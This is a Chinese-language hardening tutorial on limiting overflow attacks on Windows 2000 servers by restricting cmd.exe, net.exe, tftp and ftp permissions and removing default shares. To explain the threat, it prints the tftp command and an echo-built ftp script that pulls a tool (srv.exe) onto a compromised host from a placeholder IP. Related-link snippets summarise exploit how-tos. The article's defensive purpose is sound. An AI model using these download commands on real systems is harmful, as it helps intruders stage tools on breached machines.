安全高招:让溢出攻击远离我们

我相信但凡有接触黑客或者安全这方面的朋友,都一定有接触过溢出攻击或接触过这一类词,也就是有了溢出攻击,以及高手们所发布的溢出程序,才有了那么多的“快餐黑客”。

  无可否认,溢出攻击无论是对黑客,或者安全检测人员来说,都是对一台主机测试的时候所会采取的手段,因为溢出攻击如果成功的话,可以令我们迅速获取对方主机的一定权限。

  但是,我们利用溢出就开心,但是网管呢,他可就惨了,尤其是一台专门用来保护重要数据的主机如果给一些无良黑客,或应该说是骇客吧,他们入侵后,大量删除数据,无论你有没有备份数据,损失都是十分严重的,所以有效地打补丁倒也是一个好方法,但是,有时候你忘记了呢?或者不知道呢,又或者对方用的是0day Exploit呢!所以打补丁是有效,但不是唯一的方法。

  但是我却在看某安全杂志的时候,有一个牛人说到给cmd.exe设置权限,可以有效地防止溢出,再加上我和一些高手交流的时候,说到这个,他们也说理论上可以行得通,但是他们却叫我试试。-_-#

  好了,不再废话了,下面说说怎么防止溢出。各位网管可要看仔细啦!

  首先,我们可以建立一个用户,名字就叫CmdUser,密码就设置强壮一点,而且如果你追求完美的话,可以在用户的名称前面加上一个$.按照网上所公布的方法,建立一个隐藏帐户,这样,就算给人入侵了,也不会使用net user cmduser passworld 来修改这个用户的密码。记住哦,那个用户必须是user等级的哦!

  建立了用户后,来到c:\winnt\system32,(这里系统安装在C盘).找到cmd.exe,用右键打开属性,在安全那里,如图一所示

  我们所要做的就是把所有的用户删除,然后添加CmdUser这个用户,完成后就确定就可以了,但是不要以为这样就可以了哦,还要找到net.exe这个按照cmd.exe的方法来设置,估计大家找到了net.exe的时候,发现旁边还有一个net1.exe,这个也要设置哦,设置好了,不要以为松了一口气,其实这样虽然可以对付一些菜鸟黑客,但是,如果对方是老鸟来的话,他可以通过tftp,或者ftp等等来传输一个本地溢出的溢出程序,我们就game over了,或者他上传一个木马,利用替换服务这个方法呢,这个倒也是令人防不胜防啊

可能读者就要问了,你既然提出来,是不是有方法解决啊,不错!也算是一点点方法啦,下面就先说说tftp的方法,这个很简单的,进入C:\WINNT\system32\drivers\etc,用记事本打开services这个文件,如图2所示

  把tftp这个端口修改为0.。这样,入侵着就不会通过使用tftp –I Host get files.exe文件来达到传输自己的工具。当然,为了更好的安全性,我们可以通过搜索tftp.exe这个文件,然后把tftp这个执行文件按照cmd。exe那样,添加成为只有cmduser这个用户才可以使用。下面就再说说另外一个方法。

  我相信,大家应该还记得一个使用echo命令来利用ftp来下载东西的命令吧,什么?你不知道?我来说一下:

  echo open xxx.xxx.xxx.xxx >ftp.txt
  echo user >>ftp.txt
  echo password >>ftp.txt
  echo get srv.exe >>ftp.txt
  echo bye >>ftp.txt
  
  ftp -s:ftp.txt
  del ftp.txt

  这样就可以把srv.exe这个软件下载了,我们也可以按照cmd的方法,通过把ftp的使用权限分配给cmduser,这样的话,就可以避免给对方上传软件了,其实还是有很多方法可以上传的,但是我还是留下了一些思路给读者,因为,只有这样,我们才可以提高自己的技术。另外呢,可能有些朋友可能会利用以下这么一个脚本来关闭ipc$默认共享:

  @echo off
  net share c$ /del
  net share d$ /del
  net share e$ /del
  net share f$ /del
  net share ipc$ /del
  net share admin$ /del
  @cls

  但是我们这样设置的话,可能会令到他们觉得很麻烦,所以,我们是不是可以在最后面那里加上一个 net start explorer ,然后做成开机脚本,这样可能会好一点哦,为什么说可能呢?因为我由于时间关系,所以没有来得及试验,希望试验成功的朋友到论坛发表一下你的看法!

  下次有机会的话,我可能还说说怎么防止sql injection.。如果试验的过程中还是有什么疑问的话,欢迎e-mail to :ytt@hackbase.net

(0)

相关推荐

  • 安全高招:让溢出攻击远离我们

    我相信但凡有接触黑客或者安全这方面的朋友,都一定有接触过溢出攻击或接触过这一类词,也就是有了溢出攻击,以及高手们所发布的溢出程序,才有了那么多的"快餐黑客". 无可否认,溢出攻击无论是对黑客,或者安全检测人员来说,都是对一台主机测试的时候所会采取的手段,因为溢出攻击如果成功的话,可以令我们迅速获取对方主机的一定权限. 但是,我们利用溢出就开心,但是网管呢,他可就惨了,尤其是一台专门用来保护重要数据的主机如果给一些无良黑客,或应该说是骇客吧,他们入侵后,大量删除数据,无论你有没有备份数据

  • 缓冲区溢出:十年来攻击和防卫的弱点

    摘要: 在过去的十年中,以缓冲区溢出为类型的安全漏洞占是最为 常见的一种形式了.更为严重的是,缓冲区溢出漏洞占了远程网 络攻击的绝大多数,这种攻击可以使得一个匿名的Internet用户 有机会获得一台主机的部分或全部的控制权!如果能有效地消除 缓冲区溢出的漏洞,则很大一部分的安全威胁可以得到缓解.在 本文中,我们研究了各种类型的缓冲区溢出漏洞和攻击手段,同 时我们也研究了各种的防御手段,这些手段用来消除这些漏洞所 造成的影响,其中包括我们自己的堆栈保护方法.然后我们要考 虑如何在保证现有系统功能

  • ADSL防御黑客攻击的十大方法

    目前,使用ADSL的用户越来越多,由于ADSL用户在线时间长.速度快,因此成为黑客们的攻击目标.现在网上出现了各种越来越详细的"IP地址库",要知道一些ADSL用户的IP是非常容易的事情.要怎么保卫自己的网络安全呢?不妨看看以下方法. 一.取消文件夹隐藏共享 如果你使用了Windows 2000/XP系统,右键单击C盘或者其他盘,选择"共享",你会惊奇地发现它已经被设置为"共享该文件夹",而在"网上邻居"中却看不到这些内容,这

  • Serv-U防溢出提权攻击解决设置方法

    前言: 大家应该都还没有忘记三年前在Serv-U5.004版的之前所有版本的"Serv-U FTPMDTM命令缓冲区溢出"与"Serv-U FTP服务器LIST命令超长-l参数远程缓冲区溢出漏洞"吧,这个漏洞让很多服务器管理员立坐不安,也让很多大型的站点.甚至电信级的服务器沦陷了...随着Serv-U新版本的推出,这个漏同已经不存在了:虽然溢出不存在了,但黑客永远也没有停止,所以伴随着来的又是Serv-U5.0到6.0之黑客常用的本地提升权限缺陷.(注:最常见的就如

  • 网络常见攻击与防范完全手册

    一.前言热点网络 在网络这个不断更新换代的世界里,网络中的安全漏洞无处不在.即便旧的安全漏洞补上了,新的安全漏洞又将不断涌现.网络攻击正是利用这些存在的漏洞和安全缺陷对系统和资源进行攻击. 也许有人会对网络安全抱着无所谓的态度,认为最多不过是被攻击者盗用账号,造不成多大的危害.他们往往会认为"安全"只是针对那些大中型企事业单位和网站而言.其实,单从技术上说,黑客入侵的动机是成为目标主机的主人.只要他们获得了一台网络主机的超级用户权限后他们就有可能在该主机上修改资源配置.安置"

  • 黑客如何利用Ms05002溢出找“肉鸡” (图)

    溢出攻击永远是安全界中,不可忽视的角色.而如今也正是肉鸡短缺的年代,能掌握一门最新的Ms05002溢出,必定会让你有"惊人"的收获.至于熟练的溢出如何炼成?具体方法请见下文所示! 实施方法:通过Ms05002攻击工具,溢出反弹IP.反弹端口,会生成含有木马性质的文件.然后将这个产生的文件,以QQ传输的形式发给受害者观看,或者将其上传到自己的主页空间,引诱其他人访问.最后执行NC瑞士军刀,监听本机端口,收取已经运行产生文件的主机. 步骤1.首先从网上下载Ms05002溢出工具,释放到比较

  • 我是如何发现CCProxy远程溢出漏洞的

    CCProxy是一个国产的支持HTTP.FTP.Gopher.SOCKS4/5.Telnet.Secure(HTTPS).News(NNTP). RTSP.MMS等代理协议的代理服务器软件.因为其简单易用.界面友好,非常适合在对流量要求不高的网络环境中使用,所以在国内有很多初级的网管喜欢用这个软件,有时候我在公司上网也要用它做代理.前些日子我测试发现CCProxy 6.0版本存在多处缓冲区溢出漏洞,可以导致攻击者远程执行任意代码. TIPS:什么是Gopher.RTSP.MMS? Gopher是

  • 图片引发的溢出危机(图)

    就在刚迈入2006年之际,Windows系统出现了一个严重的漏洞,这就是Microsoft Windows图形渲染引擎wmf格式代码漏洞(ms0601).这个漏洞出现在Windows的图形渲染引擎中,黑客可以构造恶意的wmf文件,引诱其他用户打开,当系统没有更新过wmf补丁时,将会执行黑客事先设置好的恶意代码,获取系统的最高权限,从而完全听命于黑客.就在漏洞公布几天后,网络上使用wmf漏洞进行传播的病毒.攻击事件不断,直至今日,网上仍然充斥着无数利用wmf漏洞的攻击.本文将向大家介绍有关wmf漏

  • 诱人视频请君入瓮 解析RealPlayer溢出漏洞

    有这样一种视频,它极其诱人,你无法抗拒它的诱惑,点击.在一阵等待之后,你会觉察到刚才看到的只是"海市蜃楼",此时,你已身处深不见底的"瓮"中. RealPlayer是大家常用的媒体播放器,用户非常多,因此它一旦出现漏洞,必定会有很多人遭到攻击.以前RealPlayer Server就曾爆出过一个远程溢出漏洞,使得许多影视网站遭到攻击.如今,当大家已淡忘上次的漏洞灾害所带来的痛苦时,新版RealPlayer中又出现了溢出漏洞. 现在,众多"黑客"已

  • Nginx中防止SQL注入攻击的相关配置介绍

    防止sql注入最好的办法是对于提交后台的所有数据都进行过滤转义. 对于简单的情况,比如包含单引号' , 分号;, <, >, 等字符可通过rewrite直接重订向到404页面来避免. 用rewrite有个前提需要知道,一般用rewrite进行正则匹配只能匹配到网页的URI,也就是url中?前部分,?以后部分是请求参数. 问号后面的请求参数,在nginx用$query_string表 示,不能在rewrite中匹配到,需要用if判断 例如,对于参数中带有单引号的'进行匹配然后定向到错误页面, /

随机推荐